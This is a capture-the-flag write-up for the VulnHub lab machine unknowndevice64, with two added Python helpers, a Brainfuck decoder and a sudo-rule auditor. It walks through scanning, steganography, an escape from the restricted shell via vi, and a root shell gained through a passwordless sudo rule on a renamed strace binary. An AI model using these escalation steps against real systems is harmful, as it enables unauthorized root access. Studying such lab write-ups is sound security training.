unknowndevice64 (VulnHub writeup)
Target IP: 10.0.2.8
by sc00by
##########
NMAP scan:
##########
root@kalilinux:~/Documents/VulnHub/unknowndevice64# nmap -p- -sT -sV 10.0.2.8
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-22 10:59 CDT
Nmap scan report for 10.0.2.8
Host is up (0.00095s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
1337/tcp open ssh OpenSSH 7.7 (protocol 2.0)
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
MAC Address: 08:00:27:E3:39:6C (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.40 seconds
[~!~] These are just normal services running
on non-standard ports.
########################
Python SimpleHTTPServer:
########################
[~!~] There is a Python SimpleHTTPServer
running on port 31337.
NOTE: the page shows "h1dd3n" in red; it could
be something important.
If we view the source of the homepage,
we find this:
[~!~] Perhaps a file on the webserver?
root@kalilinux:~/Documents/VulnHub/unknowndevice64# wget 10.0.2.8:31337/key_is_h1dd3n.jpg
--2019-04-22 11:13:28-- http://10.0.2.8:31337/key_is_h1dd3n.jpg
Connecting to 10.0.2.8:31337... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5386 (5.3K) [image/jpeg]
Saving to: ‘key_is_h1dd3n.jpg’
key_is_h1dd3n.jpg 100%[=========================>] 5.26K --.-KB/s in 0s
2019-04-22 11:13:28 (198 MB/s) - ‘key_is_h1dd3n.jpg’ saved [5386/5386]
root@kalilinux:~/Documents/VulnHub/unknowndevice64# file key_is_h1dd3n.jpg
key_is_h1dd3n.jpg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x300, components 1
[~!~] Steg tools can help us extract anything
hidden within the file
root@kalilinux:~/Documents/VulnHub/unknowndevice64# steghide --extract -sf key_is_h1dd3n.jpg
Enter passphrase:
...
[~!~] Hmmm, a passphrase. Let's try the string we found
on the website: h1dd3n
...
wrote extracted data to "h1dd3n.txt".
root@kalilinux:~/Documents/VulnHub/unknowndevice64# ls
h1dd3n.txt index.html key_is_h1dd3n.jpg
root@kalilinux:~/Documents/VulnHub/unknowndevice64# cat h1dd3n.txt
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++.-----------------.<----------------.--.++++++.---------.>-----------------------.<<+++.++.>+++++.--.++++++++++++.>++++++++++++++++++++++++++++++++++++++++.-----------------.
[~!~] This is the Brainfuck esoteric programming language;
we last saw it in the
Kuya1 writeup.
Decoded:
ud64:1M!#64@ud
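The decoding step above can be reproduced offline. The following is an added example, not part of sc00by's writeup: a small Brainfuck interpreter (8-bit wrapping cells, a bounded tape and a step limit so an untrusted program cannot hang the analyst's machine) run over a constructed copy of the program extracted from h1dd3n.txt. Its output is the credential string the writeup reports.

```python
# Added example (not from the writeup): a minimal Brainfuck interpreter used to
# decode the program recovered from h1dd3n.txt without an online decoder.

# Constructed copy of the program shown in the writeup (from h1dd3n.txt).
H1DD3N_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>>>+++++++++++++++++."
    "-----------------.<----------------.--.++++++.---------."
    ">-----------------------.<<+++.++.>+++++.--.++++++++++++."
    ">++++++++++++++++++++++++++++++++++++++++.-----------------."
)


def build_jump_table(code):
    """Pre-match every '[' with its ']' so loop jumps are O(1).
    Unbalanced brackets are rejected up front instead of misbehaving at runtime."""
    stack, jumps = [], {}
    for i, ch in enumerate(code):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jumps[j], jumps[i] = i, j
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    return jumps


def run_brainfuck(code, stdin=b"", tape_size=30000, max_steps=10_000_000):
    """Execute a Brainfuck program and return everything it prints as bytes.
    Cells wrap at 8 bits; the tape is bounds-checked; max_steps caps runtime."""
    code = "".join(ch for ch in code if ch in "<>+-.,[]")  # drop non-command chars
    jumps = build_jump_table(code)
    tape = bytearray(tape_size)
    inp = list(stdin)
    out = bytearray()
    ptr = pc = steps = 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded; program did not terminate")
        ch = code[pc]
        if ch == ">":
            ptr += 1
            if ptr >= tape_size:
                raise IndexError("tape pointer ran off the right end")
        elif ch == "<":
            ptr -= 1
            if ptr < 0:
                raise IndexError("tape pointer ran off the left end")
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & 0xFF
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & 0xFF
        elif ch == ".":
            out.append(tape[ptr])
        elif ch == ",":
            tape[ptr] = inp.pop(0) if inp else 0  # EOF reads as 0
        elif ch == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif ch == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    return bytes(out)


def decode_h1dd3n():
    """Decode the program from the writeup; returns 'ud64:1M!#64@ud'."""
    return run_brainfuck(H1DD3N_PROGRAM).decode("ascii")


if __name__ == "__main__":
    print(decode_h1dd3n())
```

The initial loop `++++++++++[>+>+++>+++++++>++++++++++<<<<-]` seeds four cells with 10, 30, 70 and 100, and every later character is produced by nudging one of those cells up or down to the wanted ASCII value, which is why the same cells are reused for the repeated "ud" and "64".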
##################
We Got Some Creds:
##################
USER: ud64
PASS: 1M!#64@ud
[~!~] The other service we saw running was
SSH via port 1337.
root@kalilinux:~/Documents/VulnHub/unknowndevice64# ssh ud64@10.0.2.8 -p 1337
The authenticity of host '[10.0.2.8]:1337 ([10.0.2.8]:1337)' can't be established.
ECDSA key fingerprint is SHA256:i17eNafYZbuhnBTVOd3NGK7az/9ZPgwR8GQzqGenV9g.
Are you sure you want to continue connecting (yes/no)?
yes
Warning: Permanently added '[10.0.2.8]:1337' (ECDSA) to the list of known hosts.
ud64@10.0.2.8's password:
Last login: Mon Dec 31 08:37:58 2018 from 192.168.56.101
ud64@unknowndevice64_v1:~$
[~!~] And we got a shell on the box!
###################
A Shell on the Box:
###################
[~!~] I quickly learned that this was an
EXTREMELY restricted shell, which I
have not had much experience with.
Here is some of me struggling:
ud64@unknowndevice64_v1:~$ sudo -l
-rbash: sudo: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s 2 =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f 2>/dev/null
-rbash: /dev/null: restricted: cannot redirect output
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f 2>/dev/null
-rbash: /dev/nul: restricted: cannot redirect output
ud64@unknowndevice64_v1:~$ din
ud64@unknowndevice64_v1:~$ find / -perm =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s =
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ find / -perm -u=s -type f
-rbash: find: command not found
ud64@unknowndevice64_v1:~$ whoami
ud64
ud64@unknowndevice64_v1:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
ud64@unknowndevice64_v1:~$ which python
-rbash: which: command not found
ud64@unknowndevice64_v1:~$ cd
-rbash: cd: restricted
[~!~] The WORST PART is that pressing 'backspace'
just mapped to 'space'.
I learned that you can press tab twice to list the
commands available to you in a restricted shell:
ud64@unknowndevice64_v1:~$
! alias case continue do esac fc hash jobs mapfile read shift time ulimit wait
./ bg cd coproc done eval fg help kill mc readarray shopt times umask while
: bind command date echo exec fi history let popd readonly source trap unalias whoami
[ break compgen declare elif exit for id local printf return suspend true unset {
[[ builtin complete dirs else export function if logout pushd select test type until }
]] caller compopt disown enable false getopts in ls pwd set then typeset
vi
[~!~] [un]Luckily for us we can use vi, and
there is a way to break out
bash-4.4$ whoami
ud64
[~!~] Now we have an unrestricted shell!
From here we can set our PATH and
SHELL so we can reach the other
commands we need:
bash-4.4$ export PATH=/usr/bin:$PATH
bash-4.4$ export SHELL=/bin/bash:$SHELL
########
PrivEsc:
########
bash-4.4$ sudo -l
User ud64 may run the following commands on unknowndevice64_v1:
(ALL) NOPASSWD: /usr/bin/sysud64
[~!~] A command we can run at sudo level
with no password
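From the defender's side, this is the rule an audit should have caught. The following is an added example, not code from sc00by's writeup: a parser for `sudo -l` output that extracts each rule's run-as target, tags and command, and flags the combinations that matter (NOPASSWD, runs as root, or ALL). The sample input is a constructed copy of the two `sudo -l` lines shown above; the regex and the risk criteria are my own assumptions, not sudo's grammar in full.

```python
# Added example (not from the writeup): audit `sudo -l` output for rules that
# grant passwordless or root-level command execution.
import re

# Constructed copy of the `sudo -l` output shown in the writeup.
SAMPLE_SUDO_L = """\
User ud64 may run the following commands on unknowndevice64_v1:
    (ALL) NOPASSWD: /usr/bin/sysud64
"""

# Matches "(runas) TAG: TAG: cmd1, cmd2" rule lines; the "User X may run" header is skipped.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")


def parse_sudo_l(text):
    """Return a list of (runas, tags, command) tuples, one per command in each rule line."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").strip()
        tags = tuple(t.rstrip(":") for t in m.group("tags").split())
        for cmd in m.group("cmds").split(","):
            rules.append((runas, tags, cmd.strip()))
    return rules


def risky_rules(rules):
    """Flag rules that need no password, run as root, or allow any command.
    Returns a list of (command, [reasons]) for a reviewer to chase down."""
    findings = []
    for runas, tags, cmd in rules:
        reasons = []
        if "NOPASSWD" in tags:
            reasons.append("no password required")
        # The user part of "user:group" decides the effective uid.
        if runas.split(":")[0].strip() in ("ALL", "root"):
            reasons.append("runs as root")
        if cmd == "ALL":
            reasons.append("any command")
        if reasons:
            findings.append((cmd, reasons))
    return findings


def audit(text=SAMPLE_SUDO_L):
    """Parse and flag in one step; returns the findings list."""
    return risky_rules(parse_sudo_l(text))


if __name__ == "__main__":
    for cmd, reasons in audit():
        print(f"{cmd}: {', '.join(reasons)}")
```

A flagged command is only the first half of the review: the name of the binary tells you nothing (here /usr/bin/sysud64 turns out to be something else entirely once asked for its help text), so each flagged path should be inspected for what it actually is, whether it can spawn a shell or write files, and whether the rule can be narrowed or replaced.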
bash-4.4$ sysud64 -h | head
usage:
strace
[-CdffhiqrtttTvVwxxy] [-I n] [-e expr]...
[-a column] [-o file] [-s strsize] [-P path]...
-p pid... / [-D] [-E var=val]... [-u username] PROG [ARGS]
or: strace -c[dfw] [-I n] [-e expr]... [-O overhead] [-S sortby]
-p pid... / [-D] [-E var=val]... [-u username] PROG [ARGS]
Output format:
-a column alignment COLUMN for printing syscall results (default 40)
-i print instruction pointer at time of syscall
-k obtain stack trace between each syscall (experimental)
[~!~] So sysud64 is actually strace, and there are
known privesc techniques for strace:
bash-4.4$ sudo sysud64 -o /dev/null /bin/sh
sh-4.4# whoami
root
[~!~] AND JUST LIKE THAT WE ARE ROOT!
#########
THE FLAG:
#########
sh-4.4# cd /root
sh-4.4# ls
Desktop Documents Downloads Music Pictures Public Videos
flag.txt
sh-4.4# cat flag.txt
[ASCII-art flag banner reading: "A hacker does for love what others would not do for money." followed by "./unknowndevice64"]
[~!~] That was a very fun box! Would highly recommend
trying it out yourself!
~sc00by